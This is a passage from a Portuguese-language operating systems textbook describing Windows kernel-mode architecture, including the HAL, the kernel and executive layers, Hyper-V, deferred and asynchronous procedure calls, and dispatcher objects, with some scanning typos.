Internals, sexta edição, Partes 1 e 2 (RUSSINOVICH e 
SOLOMON, 2012). 


11.3.1 Estrutura do sistema operacional 


Como descrito anteriormente, o sistema operacio- 
nal Windows consiste em várias camadas, como mos- 
trado na Figura 11.4. Nas próximas seções, iremos 
até os níveis mais baixos do sistema operacional: os 
executados no modo núcleo. A camada central é o pró- 
prio núcleo do NTOS, que é carregado do ntoskrnl.exe 
quando o Windows inicializa. O NTOS tem duas ca- 
madas, o executivo, contendo a maioria dos serviços, 
e uma camada menor, chamada (também) de núcleo, 
que implementa os fundamentos das abstrações de 
sincronização e escalonamento de threads (um núcleo 
dentro do núcleo?), e também tratadores de intercep- 
tação (trap handler), interrupções e outros aspectos de 
como a CPU é gerenciada. 

A divisão do NTOS em núcleo e executivo é um re- 
flexo das raízes VAX/VMS do NT. O sistema operacio- 
nal VMS, que também foi projetado por David Cutler, 
tinha quatro camadas adaptadas ao hardware: usuário, 


supervisor, executivo e núcleo, correspondentes aos 
quatro modos de proteção fornecidos pela arquitetura 
do processador VAX. As CPUs Intel também dão supor- 
te a quatro anéis de proteção, mas alguns dos primeiros 
processadores feitos para o NT não; assim, as camadas 
do núcleo e do executivo representam uma abstração 
imposta pelo software, e as funções que o VMS oferece 
no modo supervisor, como spooling de impressora, são 
oferecidas pelo NT como serviços do modo usuário. 

As camadas do modo núcleo do NT são mostradas 
na Figura 11.11. A camada do núcleo do NTOS é mos- 
trada acima da camada executiva porque implementa os 
mecanismos de interrupção e interceptação usados na 
transição do modo usuário para o modo núcleo. 

A camada mais acima na Figura 11.11 é a biblio- 
teca de sistema ntdll.dll, que na verdade é executada 
no modo usuário. A biblioteca de sistema inclui uma 
série de funções de suporte ao runtime do compilador 
e bibliotecas de baixo nível, de forma similar ao que 
está na libe do UNIX. A ntdll.dil também contém pon- 
tos de entrada de código especiais usados pelo núcleo 
para inicializar threads e despachar exceções e APCs 
(Asynchronous Procedure Calls — Chamadas as- 
sincronas de procedimento) do modo usuário. Como 
a biblioteca de sistema é muito integrada à operação 
do núcleo, todo processo do modo usuário criado pelo 
NTOS tem a ntdll mapeada no mesmo endereço fixo. 
Quando o NTOS está inicializando o sistema, ele cria 
um objeto de seção para usar no mapeamento da ntdll 
e também grava endereços dos pontos de entrada do 
núcleo na ntdil. 

Abaixo das camadas executiva e do núcleo no 
NTOS há o software chamado HAL (Hardware Abs- 
traction Layer — Camada de abstração de hardware), 
que abstrai os detalhes de baixo nível dos dispositivos, 
como o acesso aos registradores e operações DMA, e 
o modo como a firmware da placa-mãe representa as 
informações de configuração e lida com as diferenças 
nos chips de suporte da CPU, assim como vários con- 
troladores de interrupção. 


le MRE Organização do modo núcleo do Windows. 
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Modo usuário 
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A camada de software mais baixa é o hipervisor, que 
o Windows chama de Hyper-V. O hipervisor é um re- 
curso opcional (não mostrado na Figura 11.11) que está 
disponível em muitas versões do Windows — incluindo 
o cliente desktop profissional. O hipervisor intercepta 
muitas das operações privilegiadas realizadas pelo nú- 
cleo e as simula de modo a permitir que vários siste- 
mas operacionais sejam executados ao mesmo tempo. 
Cada sistema operacional é executado em sua própria 
máquina virtual, que o Windows chama de partição. O 
hipervisor utiliza recursos na arquitetura de hardware 
para proteger a memória física e fornecer isolamento 
entre as partições. Um sistema operacional sendo exe- 
cutado no topo do hipervisor executa threads e trata de 
interrupções em abstrações dos processadores físicos, 
chamados processadores virtuais. O hipervisor escalo- 
na os processadores virtuais nos processadores físicos. 

O sistema operacional principal (raiz) é executado 
na partição raiz. Ele oferece muitos serviços às outras 
partições (hóspedes). Alguns dos serviços mais impor- 
tantes oferecem integração dos hóspedes com os dispo- 
sitivos compartilhados, como redes e a GUI. Embora o 
sistema operacional raiz deva ser Windows ao executar 
o Hyper-V, outros sistemas operacionais, como o Li- 
nux, podem ser executados nas partições de hóspedes. 
Um sistema operacional hóspede pode funcionar com 
desempenho bastante ruim, a menos que tenha sido mo- 
dificado (ou seja, paravirtualizado) para trabalhar com 
o hipervisor. 

Por exemplo, se um sistema operacional hóspede 
estiver usando uma trava giratória para o sincronismo 
entre dois processadores virtuais e o hipervisor reesca- 
lonar o processador virtual que mantém a trava girató- 
ria, o tempo de retenção da trava poderá aumentar em 


várias ordens de grandeza, deixando outros processa- 
dores virtuais que estão rodando na partição esperando 
por grandes períodos de tempo. Para resolver esse pro- 
blema, um sistema operacional hóspede é informado a 
esperar apenas por um período de tempo curto antes de 
convocar o hipervisor para abrir mão do seu processa- 
dor físico para executar outro processador virtual. 

Os outros componentes principais do modo núcleo 
são os drivers de dispositivos. O Windows os utiliza 
para qualquer recurso do modo núcleo que não seja par- 
te do NTOS ou da HAL. Isso inclui sistemas de arqui- 
vos, pilhas de protocolos de rede e extensões de núcleo, 
como antivírus e softwares de DRM (Digital Rights 
Management — Gerenciamento digital de direitos), 
além de drivers para o gerenciamento de dispositivos 
físicos, interface com barramentos de hardware etc. 

Os componentes de E/S e memória virtual coope- 
ram para carregar (e descarregar) os drivers de dispo- 
sitivos para a memória do núcleo e ligá-los às camadas 
do NTOS e da HAL. O gerenciador de E/S provê inter- 
faces que permitem que dispositivos sejam descober- 
tos, organizados e operados — incluindo providenciar 
o carregamento do driver de dispositivo apropriado. 
A maior parte das informações de configuração para 
gerenciamento de dispositivos e drivers é mantida na 
colmeia SYSTEM do registro. O subcomponente plug- 
-and-play do gerenciador de E/S mantém informações 
dos hardwares detectados na colmeia HARDWARE, 
que é uma colmeia volátil mantida na memória em vez 
de no disco, já que é recriada de forma total toda vez 
que o sistema inicializa. 

Examinaremos agora os vários componentes do sis- 
tema operacional em mais detalhes. 
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A camada de abstração de hardware 


Um dos objetivos do Windows é tornar o sistema 
operacional portátil a outras plataformas. De maneira 
ideal, para trazer o sistema operacional a um novo sis- 
tema de computador, teríamos apenas de recompilar o 
sistema operacional usando um compilador para a nova 
plataforma. Infelizmente, não é assim tão simples. En- 
quanto vários dos componentes em algumas camadas 
do sistema operacional podem ser bastante portáteis 
(porque muitos lidam com estruturas de dados internas 
e abstrações que dão suporte ao modelo de programa- 
ção), outras camadas devem lidar com registradores de 
dispositivos, interrupções, DMA e outras características 
de hardware que mudam de maneira significativa de 
máquina para máquina. 

A maior parte do código-fonte do núcleo do NTOS 
é escrita em C em vez de em linguagem assembly 
(apenas 2% é em assembly no x86, e menos de 1% no 
x64). Mesmo assim, todo esse código em C não pode 
ser simplesmente obtido de um sistema x86, jogado 
em, digamos, um sistema ARM, recompilado e reini- 
cializado em razão das várias diferenças de hardware 
entre arquiteturas de processador que nada têm a ver 
com conjuntos diferentes de instruções e que não po- 
dem ser ocultadas pelo compilador. Linguagens como 
a C tornam difícil a abstração de algumas estruturas 
de dados de hardware e parâmetros, como o formato 
de entradas na tabela de páginas e tamanhos de me- 
mória física e palavras, sem penalidades severas no 
desempenho. Todas elas, como também uma enorme 
quantidade de otimizações específicas de hardware, 
teriam de ser transportadas de forma manual, mesmo 
não sendo escritas em código assembly. 

Os detalhes do hardware sobre como a memória é 
organizada em grandes servidores, ou quais sincroniza- 
ções primitivas de hardware estão disponíveis, também 
podem ter grande impacto nos níveis mais altos do sis- 
tema. Por exemplo, o gerenciador de memória virtu- 
al do NT e a camada do núcleo sabem de detalhes de 
hardware relacionados a cache e localidade de memó- 
ria. Ao longo do sistema, o NT usa as sincronizações 
primitivas compare&swap, e seria dificil a portabilida- 
de para um sistema que não as tivesse. Por fim, há mui- 
tas dependências no sistema na ordenação de bytes em 
palavras. Em todos os sistemas para os quais o NT foi 
transportado, o hardware foi configurado para o modo 
little-endian. 

Além dessas questões maiores de portabilidade, 
também há um vasto número de problemas menores 
até entre placas-mãe diferentes de vários fabricantes. 


Diferenças nas versões das CPUs afetam como as sin- 
cronizações primitivas, como travas giratórias, são 
implementadas. Há várias famílias de chips de supor- 
te que criam diferenças em como as interrupções de 
hardware são priorizadas, como os registradores dos 
dispositivos de E/S são acessados, transferências de 
gerenciamento de DMA, controle dos temporizadores 
e do relógio de tempo real, sincronização de multipro- 
cessadores, trabalhos com recursos do firmware como 
ACPI (Advanced Configuration and Power Inter- 
face — Interface avançada de configuração e energia) 
etc. A Microsoft fez uma tentativa séria de esconder 
esses tipos de dependência de máquina em uma fina 
camada no fundo chamada de HAL, como já men- 
cionamos. O trabalho da HAL é oferecer ao resto do 
sistema operacional hardwares abstratos que ocultam 
os detalhes específicos de versão de processador, um 
conjunto de circuitos integrados de suporte e outras 
variações de configuração. Essas abstrações da HAL 
são apresentadas na forma de serviços independentes 
de máquina (chamadas de procedimentos e macros) 
que o NTOS e os drivers podem usar. 

Ao usar os serviços da HAL e não atuar no hardware 
de maneira direta, os drivers e o núcleo necessitam de 
menos mudanças quando são levados para novos pro- 
cessadores — e, na grande maioria dos casos, podem 
funcionar sem modificações em sistemas de mesma ar- 
quitetura de processador, apesar de diferenças de ver- 
sões e chips de suporte. 

A HAL não fornece abstrações ou serviços para dis- 
positivos específicos de E/S, como teclados, mouses, 
discos ou para unidade de gerenciamento de memória. 
Esses recursos ficam espalhados nos componentes do 
modo núcleo e, sem a HAL, a quantidade de código que 
teria de ser modificada sempre que fosse feito trans- 
porte do sistema operacional seria substancial, mesmo 
quando as reais diferenças de hardware fossem peque- 
nas. Transportar a própria HAL é simples porque todo o 
código que depende de máquina é concentrado em um 
lugar e os objetivos do transporte são bem definidos: 
implementar todos os serviços da HAL. Durante mui- 
tos lançamentos, a Microsoft ofereceu suporte para o 
Kit de Desenvolvimento da HAL, que possibilitava aos 
fabricantes criar sua própria HAL, permitindo a outros 
componentes do núcleo trabalhar em novos sistemas 
sem modificação, desde que as mudanças de hardware 
não fossem muito grandes. 

Como um exemplo do que a camada de abstração 
de hardware faz, compare a E/S mapeada em memó- 
ria com as portas de E/S. Algumas máquinas utili- 
zam a primeira e outras, a segunda. Como deve ser 


programado um driver: usando ou não a E/S mapeada 
em memória? Em vez de forçar uma opção — o que 
aconteceria se fosse encontrado um driver não portátil 
para uma máquina —, a camada de abstração de hard- 
ware oferece três procedimentos para os desenvolve- 
dores de drivers usarem na leitura dos registradores 
dos dispositivos. Oferece ainda outros três procedi- 
mentos para escrever neles: 


uc = READ PORT UCHAR(port); 
WRITE PORT UCHAR(port, uc); 


us = READ PORT USHORT (port); 
WRITE PORT USHORrT(port, us); 


ul = READ PORT ULONG(port); 
WRITE PORT LONG(port, ul); 


Esses procedimentos leem e escrevem, para uma 
dada porta, números inteiros sem sinal de 8, 16 e 
32 bits, respectivamente. A camada de abstração de 
hardware é que decide se a E/S mapeada em memória 
é necessária. Desse modo, um driver pode ser trans- 
portado sem modificação entre máquinas, que dife- 
rem na maneira como os registradores de dispositivos 
são implementados. 

Os drivers frequentemente precisam ter acesso a 
dispositivos específicos de E/S por várias razões. No 
nível do hardware, um dispositivo tem um ou mais 
endereços em um certo barramento. Como nos com- 
putadores modernos é comum haver muitos barra- 
mentos (ISA, PCle, USB, IEEE 1394 etc.), é possível 
que mais de um dispositivo tenha o mesmo endereço 
em barramentos diferentes; logo, é necessária alguma 
forma de diferenciá-los. A HAL oferece um serviço 
para identificar dispositivos mapeando os endere- 
ços dos dispositivos de um dado barramento em um 
endereço lógico válido no âmbito do sistema. Dessa 
maneira, não se exige que os drivers saibam qual dis- 
positivo está em qual barramento. Esse mecanismo 
também protege as camadas superiores das proprieda- 
des das estruturas e convenções de endereçamento de 
um barramento alternativo. 

As interrupções têm um problema semelhante: tam- 
bém são dependentes do barramento. Assim, a HAL 
ainda oferece serviços para identificar as interrupções 
no âmbito do sistema e serviços para permitir que os 
drivers sejam ligados às rotinas de serviços de interrup- 
ção, tornando a interrupção portátil, sem precisar saber 
qual vetor de interrupções está destinado a qual barra- 
mento. O gerenciamento do nível de requisição de inter- 
rupção também é tratado na HAL. 
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Outro serviço da HAL é configurar e gerenciar as 
transferências do DMA de maneira independente de 
dispositivo. Podem ser tratados tanto o DMA no âmbito 
do sistema quanto o DMA de placas de E/S específicas. 
Os dispositivos são referenciados por seus endereços 
lógicos. A HAL também implementa o software espa- 
lha/reúne (escrita ou leitura de blocos da memória física 
não contíguos). 

A HAL também gerencia os relógios e temporiza- 
dores de forma portátil. O tempo é monitorado em uni- 
dades de 100 ns, começando em 1º de janeiro de 1601, 
que é a primeira data dos últimos quatro séculos, o que 
simplifica o tratamento dos anos bissextos. (Teste rápi- 
do: 1800 foi um ano bissexto? Resposta rápida: não.) Os 
serviços de tempo dissociam os drivers das frequências 
reais em que os relógios são executados. 

Os componentes do núcleo algumas vezes precisam 
de sincronismo em um nível muito baixo, especialmen- 
te para impedir condições de corrida em sistemas multi- 
processadores. A HAL fornece algumas primitivas para 
gerenciar essa sincronização, como travas giratórias, na 
qual uma CPU apenas espera que um recurso ocupado 
por outra CPU seja liberado, particularmente em situa- 
ções nas quais o recurso é retido, em geral, apenas por 
algumas instruções de máquina. 

Por fim, depois de o sistema ter sido inicializado, a 
HAL informa ao firmware (BIOS) do computador e ins- 
peciona a configuração do sistema para descobrir quais 
barramentos e dispositivos de E/S o sistema contém e 
como eles estão configurados. Essa informação é, en- 
tão, colocada no registro. Um resumo de algumas das 
atribuições da HAL é dado na Figura 11.12. 


A camada do núcleo 


Acima da camada de abstração de hardware está o 
NTOS, que consiste em duas camadas: o núcleo e o 
executivo. “Núcleo” é um termo confuso no Windows, 
pois pode se referir a todo o código executado no modo 
núcleo do processador; pode também fazer referência 
ao arquivo ntoskrnl.exe que contém o NTOS, o cerne 
do sistema operacional Windows; ou pode se referir 
à camada do núcleo dentro do NTOS, que é como o 
usamos nesta seção. Ele pode até ser usado para nome- 
ar a biblioteca do Win32 do modo usuário que provê 
os invólucros para as chamadas de sistema nativas: a 
kernel32.dll. 

No sistema operacional Windows a camada do 
nucleo, ilustrada acima da camada executiva na Fi- 
gura 11.11, oferece um conjunto de abstrações para o 
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gerenciamento da CPU. As abstrações principais são os 
threads, mas o núcleo também implementa tratamento 
de exceções, interceptações e muitos outros tipos de 
interrupções. A criação e destruição das estruturas de 
dados que dão suporte à utilização de threads são im- 
plementadas na camada executiva. A camada do núcleo 
é responsável por escalonar e sincronizar os threads. Ter 
o suporte aos threads em uma camada separada permite 
à camada executiva ser implementada utilizando o mes- 
mo modelo multithreading preemptivo usado para es- 
crever códigos concorrentes no modo usuário; contudo, 
os recursos primitivos de sincronização no executivo 
são muito mais especializados. 

O escalonador de threads do núcleo é responsável 
por determinar qual thread está sendo executado em 
cada CPU do sistema. Cada thread é executado até que 
uma interrupção do tipo temporizador sinalize que é o 
momento de trocar para outro (o quantum expirou) ou 
até que precise esperar por algo, como a conclusão de 
uma operação de E/S ou a liberação de uma trava, ou 
quando um thread de prioridade alta se torna executável 
e precisa da CPU. No chaveamento de um thread para 
outro, o escalonador é executado na CPU e assegura que 
os registradores e outros estados de hardware tenham 
sido gravados. Ele então seleciona outro thread para ser 
executado na CPU e restaura o estado gravado na última 
vez que esse thread foi executado. 

Se o próximo thread a ser executado está em um 
espaço de endereçamento diferente (por exemplo, um 
processo) do thread que está sendo substituído, o es- 
calonador também deve mudar os espaços de endere- 
çamento. Os detalhes do algoritmo de escalonamento 
serão discutidos mais adiante neste capítulo, quando 
chegarmos aos processos e threads. 


Além de oferecer uma abstração de alto nível do 
hardware e tratar as trocas de threads, a camada do nú- 
cleo também tem outra função principal: proporcionar 
suporte de baixo nível para duas classes de mecanis- 
mos de sincronização: objetos de controle e objetos 
despachantes. Os objetos de controle são as estruturas 
de dados que a camada do núcleo fornece como abs- 
trações à camada executiva para o gerenciamento da 
CPU. Eles são alocados pelo executivo, mas manipula- 
dos com rotinas fornecidas pela camada do núcleo. Os 
objetos despachantes são a classe de objetos habituais 
do executivo que usam uma estrutura de dados comum 
para sincronização. 


Chamadas de procedimento adiadas 


Os objetos de controle incluem objetos primitivos 
para threads, interrupções, temporizadores, sincro- 
nização, perfis e dois objetos especiais para a im- 
plementação de DPCs e APCs. Os objetos de DPC 
(Deferred Procedure Call — Chamada de procedi- 
mento adiada) são usados para reduzir o tempo gasto 
na execução das ISRs (interrupt service routines — 
Rotinas de serviço de interrupção) em resposta a uma 
interrupção de um determinado dispositivo. Limitar 
o tempo gasto nas ISRs reduz as chances de perda de 
uma interrupção. 

O hardware do sistema atribui um nível de prioridade 
de hardware às interrupções. A CPU também associa um 
nível de prioridade ao que estiver executando, e apenas 
responde às interrupções que estiverem em um nível de 
prioridade maior do que o que está sendo usado por ela 
no momento. Os níveis normais de prioridade, incluin- 
do os de tudo o que é feito do modo usuário, são 0. As 
interrupções de dispositivos acontecem em prioridade 


3 ou mais alta, e a ISR para uma interrupção de dispo- 
sitivo é, de maneira usual, executada no mesmo nível 
de prioridade da interrupção, com o objetivo de evitar 
a ocorrência de outras interrupções menos importantes 
durante o processamento de uma mais importante. 

Se uma ISR for executada por muito tempo, o atendi- 
mento de interrupções de baixa prioridade será atrasado, 
talvez causando perda de dados ou retardando a vazão de 
E/S do sistema. Muitas ISRs podem estar em andamento 
a qualquer momento, com cada ISR sucessiva sujeita a 
interrupções de níveis mais altos de prioridade. 

Para reduzir o tempo gasto processando as ISRs, 
apenas as operações críticas são executadas, como cap- 
turar o resultado de uma operação de E/S e reinicializar 
o dispositivo. O processamento adicional da interrup- 
ção é adiado até que o nível de prioridade da CPU tenha 
baixado e não esteja mais bloqueando o atendimento 
de outras interrupções. O objeto de DPC é usado para 
representar o trabalho adicional a ser feito e a ISR con- 
voca a camada do núcleo a enfileirar a DPC na lista de 
DPCs de um determinado processador. Se a DPC é a 
primeira da lista, o núcleo registra uma solicitação espe- 
cial no hardware para interromper a CPU em prioridade 
2 (que o NT chama de nível DESPACHANTE). Quando 
a última de quaisquer ISRs em execução for concluída, 
o nível de interrupção do processador voltará para baixo 
de 2, desbloqueando a interrupção para o processamen- 
to de DPCs. A ISR para interrupção de DPC processará 
cada uma das DPCs que o núcleo enfileirou. 

A técnica de usar interrupções de software para adiar 
o processamento de interrupções é um método bem 
estabelecido de redução da latência da ISR. O UNIX 
e outros sistemas começaram a usar o processamento 
adiado na década de 1970 para lidar com o hardware 
lento e as limitações de buffer em conexões seriais aos 
terminais. A ISR buscaria os caracteres do hardware 
e os poria em fila. Depois que todo o processamento 
de interrupções de baixo nível fosse concluído, uma 
interrupção de software executaria uma ISR de baixa 
prioridade para fazer o processamento de caracteres, 
como implementar a exclusão de caracteres à esquerda 
do cursor por meio do envio de caracteres de controle ao 
terminal para apagar o último caractere exibido e mover 
o cursor uma posição para trás. 

Um exemplo similar no Windows hoje é o disposi- 
tivo de teclado. Depois que uma tecla é pressionada, 
a ISR de teclado lê o código da tecla de um regis- 
trador e então reativa a interrupção do teclado, mas 
não realiza processamento adicional da tecla naquele 
momento. Ao contrário, ela usa uma DPC para colo- 
car em fila o processamento do código da tecla até 
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que todas as interrupções de dispositivos pendentes 
tenham sido processadas. 

Como as DPCs são executadas em nível 2, elas não 
impedem a execução das ISRs de dispositivo, mas evi- 
tam a execução de qualquer thread até que todas as 
DPCs da fila terminem e o nível de prioridade da CPU 
seja trazido para baixo de 2. Os drivers de dispositivos 
e o próprio sistema devem tomar cuidado para não exe- 
cutar ISRs ou DPCs por muito tempo, pois, como não é 
permitido aos threads executar, elas podem fazer o sis- 
tema parecer vagaroso e produzir erros na execução de 
músicas, forçando a parada dos threads que estiverem 
gravando a música no buffer do dispositivo de som. Ou- 
tro uso comum de DPCs é executar rotinas em resposta 
a uma interrupção de temporizador. Para evitar o blo- 
queio de threads, eventos temporizadores que precisem 
executar por um tempo estendido devem enfileirar as 
solicitações para o pool de threads operários que o nú- 
cleo mantém para atividades de segundo plano. 


Chamada de procedimento assíncrona 


O outro objeto de controle especial do núcleo é o 
objeto de APC (Asynchronous Procedure Call — 
Chamada de procedimento assíncrona). As APCs são 
similares às DPCs por adiarem o processamento de uma 
rotina de sistema, mas, ao contrário das DPCs, que ope- 
ram no contexto de CPUs específicas, as APCs operam 
no contexto de um thread específico. No processamento 
de uma tecla pressionada, não importa em qual contexto 
a DPC é executada, porque uma DPC não passa de mais 
uma parte do processamento de interrupções, e elas só 
têm de gerenciar o dispositivo físico e realizar opera- 
ções que não dependam de threads, como gravar os da- 
dos em um buffer no espaço do núcleo. 

A rotina de DPC é executada no contexto de qual- 
quer thread que estava sendo executado quando a in- 
terrupção original aconteceu. Ela convoca o sistema de 
E/S para reportar que a operação de E/S foi completada 
e o sistema de E/S põe uma APC em espera para ser 
executada no contexto do thread, que fez a solicitação 
original de E/S, onde ela pode acessar o espaço de ende- 
reçamento do modo usuário do thread que vai processar 
a entrada. 

Quando lhe é conveniente, a camada do núcleo en- 
trega a APC para o thread e o escalona para execução. 
Uma APC é projetada para se parecer com uma chama- 
da de procedimento inesperada, de algum modo similar 
aos tratadores de sinais no UNIX. A APC do modo nú- 
cleo para a conclusão da E/S é executada no contexto do 
thread que inicializou a E/S, mas no modo núcleo. Isso 
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da a APC acesso tanto ao buffer do modo nucleo como 
a todo o espaço de endereçamento do modo usuário per- 
tencente ao processo que contém o thread. Quando uma 
APC é entregue depende do que o thread já esteja fazen- 
do e até de que tipo de sistema. Em um sistema multi- 
processador, o thread que recebe a APC precisa iniciar 
sua execução antes mesmo que a DPC seja concluída. 

As APCs do modo usuário também podem ser usa- 
das para notificar a conclusão da E/S no modo usuário ao 
thread que inicializou a operação de E/S. Elas invocam 
um procedimento do modo usuário, designado pela apli- 
cação, mas apenas quando o thread-alvo é bloqueado no 
núcleo e marcado como disponível para aceitar APCs. O 
núcleo interrompe a espera do thread e retorna ao modo 
usuário, porém com os registradores e a pilha modifica- 
dos para executar a rotina de despacho da APC na bi- 
blioteca de sistema ntdll.dll. Essa rotina invoca a rotina 
do modo usuário que a aplicação associou à operação de 
E/S. Além de especificar as APCs do modo usuário como 
um meio de execução de código quando as operações de 
E/S terminam, a API do Win32 QueueUserAPC permite 
usar as APCs para propósitos arbitrários. 

A camada executiva também usa APCs para outras 
operações além das de conclusão de E/S. Como o me- 
canismo da APC é projetado de forma cuidadosa para 
entregar as APCs apenas quando for seguro fazê-lo, ele 
pode ser usado para pôr fim aos threads de forma segura. 
Se não for um bom momento para finalizar um thread, 
ele terá declarado sua entrada em uma região crítica e 
adiará as entregas de APCs até que saia dessa região. Os 
threads do núcleo se declaram como entrando em regiões 
críticas para adiar APCs quando obtêm travas ou outros 
recursos, de modo que não possam ser terminados en- 
quanto ainda estiverem de posse do recurso. 


Objetos despachantes 


Outro tipo de objeto de sincronização é o objeto 
despachante. Este é qualquer um dos objetos habituais 
do modo núcleo (aquele tipo ao qual os usuários podem 


fazer referência com descritores) que contenha uma 
estrutura de dados chamada dispatcher header, exi- 
bida na Figura 11.13. Isso inclui semáforos, mutexes, 
eventos, temporizadores waitable e outros objetos pelos 
quais os threads podem esperar para sincronização com 
outros threads. Eles também incluem objetos represen- 
tando arquivos abertos, processos, threads e portas de 
IPC. A estrutura de dados despachante contém um flag 
representando o estado sinalizado do objeto e uma fila 
de threads aguardando pelo objeto ser sinalizado. 

Primitivas de sincronização, como semáforos, são 
objetos despachantes naturais. Os temporizadores, ar- 
quivos, portas, threads e processos também usam os 
mecanismos de objeto despachante para notificações. 
Quando um temporizador é disparado, uma operação de 
E/S é finalizada em um arquivo, dados ficam disponíveis 
em uma porta, ou um thread ou processo é terminado, 
o objeto despachante associado é sinalizado, acordando 
todos os threads que aguardavam por esse evento. 

Visto que o Windows usa um único mecanismo uni- 
ficado de sincronização com os objetos do modo nú- 
cleo, APIs especializadas, como a wait3 para aguardar 
por processos filhos no UNIX, não são necessárias para 
aguardar por eventos. De maneira frequente os threads 
querem esperar por múltiplos eventos ao mesmo tem- 
po. No UNIX, um processo pode esperar para que dados 
estejam disponíveis em qualquer um dos 64 soquetes de 
rede usando a chamada de sistema select. No Windows 
há uma API similar, WaitForMultipleObjects, mas ela 
permite que um thread espere por qualquer objeto des- 
pachante para o qual ele tenha um descritor. Podem ser 
especificados até 64 descritores para a WaitForMultiple- 
Objects, bem como um valor opcional que especifica o 
tempo para seu término (timeout). O thread fica pronto 
para executar quando qualquer um dos eventos associa- 
dos aos descritores é sinalizado ou quando o tempo para 
o término expira. 

Na verdade, há dois procedimentos diferentes que 
o núcleo usa para fazer os threads esperarem por um 
objeto despachante executável. Sinalizar um objeto de 


[FIGURA 11.13) Estrutura de dados dispatcher_header embutida em muitos objetos executivos (objetos despachantes). 
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notificação tornará executáveis todos os threads em es- 
pera. Já os objetos de sincronização apenas tornam o 
primeiro thread em espera executável e são usados para 
objetos despachantes que implementam primitivas do 
bloqueio, como mutexes. Quando um thread em espera 
por uma trava volta à execução, a primeira coisa que 
faz é tentar recuperar a trava novamente. Se apenas um 
thread de cada vez pode reter a trava, todos os outros 
threads que se tornaram prontos para execução podem 
ser bloqueados imediatamente, implicando muitas tro- 
cas de contexto desnecessárias. A diferença entre obje- 
tos despachantes usando sincronização e notificação é 
um flag na estrutura dispatcher header. 

Como um comentário à parte, os mutexes no Win- 
dows são chamados de “mutantes” no código porque 
eles foram necessários para implementar a semântica do 
OS/2 de não permitir que eles próprios se desbloqueas- 
sem quando um thread usando um deles saísse, algo que 
Cutler considerou bizarro. 


A camada executiva 


Como exibido na Figura 11.11, abaixo da cama- 
da do núcleo do NTOS está o executivo. A camada 
executiva é escrita em C, em sua maioria independe 
de arquitetura (sendo o gerenciador de memória uma 
notável exceção) e tem sido transportada a novos pro- 
cessadores com esforço apenas modesto (MIPS, x86, 
PowerPC, Alpha, IA64, x64 e ARM). O executivo 
contém uma série de componentes diferentes e todos 
funcionam usando as abstrações de controle fornecidas 
pela camada do núcleo. 

Cada componente é dividido em interfaces e estrutu- 
ras de dados internas e externas. Os aspectos internos de 
cada componente são ocultos e utilizados apenas dentro 
do próprio componente, ao passo que os aspectos exter- 
nos estão disponíveis para todos os outros componentes 
do executivo. Um subconjunto de interfaces externas 
é exportado do executável ntoskrnl.exe e os drivers de 
dispositivos podem se ligar a elas como se o executivo 
fosse uma biblioteca. A Microsoft chama muitos dos 
componentes do executivo de “gerenciadores”, porque 
cada um é responsável pela gestão de alguns aspectos 
dos serviços operacionais, como E/S, memória, proces- 
sos, objetos etc. 

Como na maioria dos sistemas operacionais, mui- 
tas das funcionalidades do executivo do Windows são 
como códigos da biblioteca, exceto que elas são execu- 
tadas em modo núcleo para que suas estruturas de dados 
sejam compartilhadas e protegidas do acesso de código 
do modo usuário e para que elas possam acessar estados 
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de hardware privilegiados, como os registradores de 
controle MMU. De outra forma, entretanto, o executivo 
está apenas executando funções em nome de quem as 
está invocando e, desse modo, é executado no thread de 
quem está invocando. 

Quando qualquer uma das funções do executivo é 
bloqueada aguardando para sincronizar com outros 
threads, o thread do modo usuário é bloqueado também. 
Isso faz sentido quando se está trabalhando em nome 
de um thread específico do modo usuário, mas pode ser 
injusto quando se executa um trabalho relacionado a ta- 
refas comuns de organização. Para evitar o sequestro do 
thread corrente quando o executivo determina que algu- 
ma tarefa de organização é necessária, diversos threads 
do modo núcleo são criados quando o sistema inicializa 
e dedicados a tarefas específicas, como se assegurar de 
que páginas modificadas sejam gravadas em disco. 

Para as tarefas previsíveis, de baixa frequência, há 
um thread que é executado uma vez por segundo e tem 
uma lista de tarefas com os itens que deve tratar. Para 
os trabalhos menos previsíveis, há um pool de threads 
operários de alta prioridade, mencionado anteriormente, 
que pode ser usado para executar tarefas delimitadas co- 
locando em fila uma solicitação e sinalizando o evento 
de sincronização pelo qual o thread está esperando. 

O gerenciador de objetos gerencia a maior parte dos 
objetos interessantes do modo núcleo usados na cama- 
da executiva. Isso inclui processos, threads, arquivos, 
semáforos, dispositivos de E/S e drivers, temporizado- 
res e muitos outros. Como descrito antes, os objetos do 
modo núcleo são, na verdade, estruturas de dados alo- 
cadas e usadas pelo núcleo. No Windows, estruturas de 
dados do núcleo têm tanto em comum que é muito útil 
gerenciar várias delas em um recurso unificado. 

Os recursos oferecidos pelo gerenciador de objetos 
incluem gerenciar a alocação e liberação de memória 
para objetos, contabilização de cota, dar suporte de 
acesso a objetos usando descritores, manter contagem 
de referência para referências de ponteiros do modo 
núcleo, assim como referências de descritor, dar nomes 
aos objetos no espaço de nomes do NT e fornecer um 
mecanismo extensível para gerenciar o ciclo de vida de 
cada objeto. As estruturas de dados do núcleo que pre- 
cisam de algum desses recursos são gerenciadas pelo 
gerenciador de objetos. 

Cada objeto do gerenciador de objetos tem um tipo 
usado para especificar como o ciclo de vida dos ob- 
jetos daquele tipo deve ser gerenciado. Estes não são 
tipos no sentido de orientação a objetos, mas são ape- 
nas uma coleção de parâmetros especificados quando 
o tipo de objeto é criado. Para criar um novo tipo, um 
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componente do executivo apenas chama uma API do 
gerenciador de objetos para fazé-lo. Os objetos sao tao 
importantes para o funcionamento do Windows que o 
gerenciador de objetos sera discutido em mais detalhes 
na próxima seção. 

O gerenciador de E/S fornece a estrutura para im- 
plementar os drivers de dispositivos de E/S e também 
uma série de serviços executivos específicos para con- 
figurar, acessar e realizar operações nos dispositivos. 
No Windows, os drivers de dispositivos podem apenas 
gerenciar dispositivos físicos, mas eles também for- 
necem extensibilidade ao sistema operacional. Muitas 
funções compiladas para o núcleo em outros sistemas 
são carregadas de forma dinâmica e ligadas pelo núcleo 
no Windows, incluindo pilhas de protocolos de redes e 
sistemas de arquivos. 

Versões recentes do Windows têm muito mais supor- 
te para a execução de drivers de dispositivos no modo 
usuário, e esse é o modelo preferido para novos drivers 
de dispositivos. Há centenas de milhares de drivers de 
dispositivos diferentes para o Windows, funcionando 
com mais de um milhão de dispositivos distintos. Isso 
representa muito código para acertar. É muito melhor 
que os defeitos de código deixem os dispositivos ina- 
cessíveis por meio de um travamento no modo usuário 
do que forçar o sistema a travar. Os erros nos drivers de 
dispositivos do modo núcleo são a maior causa da terri- 
vel BSOD (Blue Screen of Death — Tela azul da morte) 
